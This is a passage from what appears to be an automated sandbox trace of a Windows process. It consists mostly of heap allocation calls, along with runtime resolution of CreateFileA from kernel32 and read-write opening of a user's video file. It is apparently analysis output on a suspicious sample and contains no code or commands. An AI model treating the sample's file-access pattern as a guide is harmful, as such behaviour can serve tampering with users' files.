0x88cbc8 [0043.212] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0043.212] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0043.212] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0043.212] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0043.212] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b12b0 [0043.212] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0043.212] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0043.212] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0043.212] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0043.212] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0043.212] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0043.213] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0043.213] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0043.213] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0043.213] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0043.213] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0043.213] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0043.213] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0043.213] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0043.213] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0043.213] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0043.213] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0043.213] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0043.213] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0043.213] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0043.213] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0043.213] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0043.213] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0043.213] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0043.213] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0043.213] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0043.213] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0043.213] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0043.213] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0043.213] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0043.213] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0043.213] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0043.213] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0043.213] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0043.213] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0043.213] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0043.213] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0043.214] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0043.214] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0043.214] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0043.214] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0043.214] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0043.214] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0043.214] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0043.214] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0043.214] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0043.214] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0043.214] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0043.214] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0043.214] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0043.214] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0043.214] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0043.214] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0043.214] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0043.214] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0043.214] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0043.214] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0043.214] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0043.214] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0043.214] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0043.214] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0043.214] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0043.214] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0043.214] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0043.214] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0043.215] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0043.215] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0043.215] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xb) returned 0x88cbc8 [0043.215] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x88cbc8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0043.215] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0043.215] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFile") returned 0x0 [0043.215] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0043.215] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0043.215] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0043.215] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1378 [0043.215] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0043.215] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0043.215] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0043.215] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cbc8 [0043.215] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x88cbc8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0043.215] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0043.215] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFileA") returned 0x76e253c6 [0043.215] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0043.215] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0043.215] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1378 | out: hHeap=0x770000) returned 1 [0043.215] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0043.215] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1378 [0043.215] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0043.215] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0043.215] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0043.215] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0043.215] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0043.216] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0043.216] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0043.216] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10001) returned 0xab2010 [0043.216] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\Myt71e.flv", cchWideChar=63, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 63 [0043.216] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x3f) returned 0x7ab260 [0043.216] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\Myt71e.flv", cchWideChar=63, lpMultiByteStr=0x7ab260, cbMultiByte=63, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\Myt71e.flv", lpUsedDefaultChar=0x0) returned 63 [0043.216] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0043.216] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0043.216] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0043.216] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0043.216] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0043.216] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0043.216] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0043.216] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0043.217] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1378 | out: hHeap=0x770000) returned 1 [0043.217] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\Myt71e.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_mhpwjr_yl93 b\\myt71e.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0043.217] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0043.217] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b8158 [0043.217] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1378 [0043.217] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0043.217] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0043.217] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0043.217] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0043.217] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0043.217] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0043.217] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0043.217] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0043.217] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0043.218] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0043.219] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0043.219] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xab2010, cbMultiByte=63, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 63 [0043.219] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x7e) returned 0x7d5bb8 [0043.219] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xab2010, cbMultiByte=63, lpWideCharStr=0x7d5bb8, cchWideChar=63 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\Myt71e.flv") returned 63 [0043.219] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897d8 | out: hHeap=0x770000) returned 1 [0043.219] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5b30 [0043.220] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5bb8 | out: hHeap=0x770000) returned 1 [0043.220] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xab2010 | out: hHeap=0x770000) returned 1 [0043.220] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0043.220] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0043.220] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0043.220] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0043.220] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0043.220] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0043.220] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0043.220] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0043.220] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0043.220] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0043.220] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0043.220] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0043.220] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0043.220] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0043.220] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0043.220] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0043.220] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0043.220] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0043.220] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0043.220] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0043.220] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0043.220] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0043.220] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0043.220] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0043.220] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0043.220] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0043.220] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0043.220] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0043.220] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0043.220] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0043.220] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0043.221] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0043.221] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0043.221] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0043.221] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0043.221] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0043.221] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0043.221] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0043.221] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0043.221] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0043.221] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0043.221] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0043.221] FreeLibrary (hLibModule=0x76e10000) returned 1 [0043.221] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0043.221] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0043.221] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0043.221] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0043.221] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0043.221] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0043.221] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0043.221] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0043.221] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0043.221] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0043.221] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0043.221] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c880 | out: hHeap=0x770000) returned 1 [0043.221] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889508 | out: hHeap=0x770000) returned 1 [0043.221] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0043.221] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0043.221] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0043.221] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0043.221] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0043.221] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca00 | out: hHeap=0x770000) returned 1 [0043.221] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8c8 | out: hHeap=0x770000) returned 1 [0043.221] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0043.221] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0043.221] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0043.221] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0043.222] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb38 | out: hHeap=0x770000) returned 1 [0043.222] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0043.222] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0043.222] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0043.222] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0043.222] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc70 | out: hHeap=0x770000) returned 1 [0043.222] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdf0 | out: hHeap=0x770000) returned 1 [0043.222] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0043.222] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0043.222] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce80 | out: hHeap=0x770000) returned 1 [0043.222] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0043.222] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c910 | out: hHeap=0x770000) returned 1 [0043.222] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0043.222] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0043.222] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5c40 | out: hHeap=0x770000) returned 1 [0043.222] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0043.222] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b12b0 [0043.222] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0043.222] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0043.222] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0043.222] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0043.222] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0043.222] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0043.222] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0043.222] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0043.222] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0043.222] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0043.222] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0043.222] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0043.222] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0043.222] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0043.222] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0043.222] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0043.222] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 